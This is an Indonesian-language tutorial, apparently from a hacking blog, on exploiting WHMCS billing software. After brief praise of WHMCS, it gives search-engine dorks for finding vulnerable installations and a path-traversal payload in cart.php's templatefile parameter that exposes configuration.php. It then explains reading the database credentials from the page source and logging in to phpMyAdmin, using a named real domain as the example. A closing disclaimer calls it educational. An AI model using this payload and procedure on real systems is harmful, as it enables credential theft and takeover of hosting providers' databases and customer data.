WHMCS adalah suatu script yang sekarang paling dipakai oleh banyak kalangan webhoster karena dengan memanage yang mudah. WHMCS juga adalah sebuah billing yang berfungsi untuk pembuatan account hosting,reseller,vps maupun dedicated.
WHMCS bisa dikatakan billing paling bagus untuk saat ini dan bisa dikatakan billing nomor 1, WHMCS melebihi billing2 yang lain seperti ModernBill,AcountLab ++ dan lainnya. fitur WHMCS juga boleh dikatakan hampir komplit untuk urusan memanaged hosting, anda akan di manjakan dengan BILLING WHMCS ini
Exploit Powered by whmcs
#Keyword Dork :
1. inurl:whmcs/cart.php?a=
2. inurl:billing/cart.php?a=
#Injector :
cart.php?a=test&templatefile=../../../configuration.php
#Contoh [sudah di patch] :
http://www.7m2.net/whmcs/cart.php?
#Tambahkan Injector di belakang cart.php? sehingga menjadi :
http://target.com/whmcs/cart.php?a=test&templatefile=../../../configuration.php
#Selanjutnya klik kanan > View page source
#Cari tulisan yang berwarna hijau seperti gambar di bawah ini :
#Selanjutnya kalian tinggal login di halaman PHPMyAdmin, contoh :
http://www.7m2.net/phpmyadmin
Selesai.
Tutorial ini hanya sebagai pembelajaran saja dan tidak bertujuan untuk merusak system milik siapapun. Dan juga sebagai peringatan kepada Admin WHMCS untuk segera melakukan patch untuk menghindari hal - hal yang tidak diinginkan.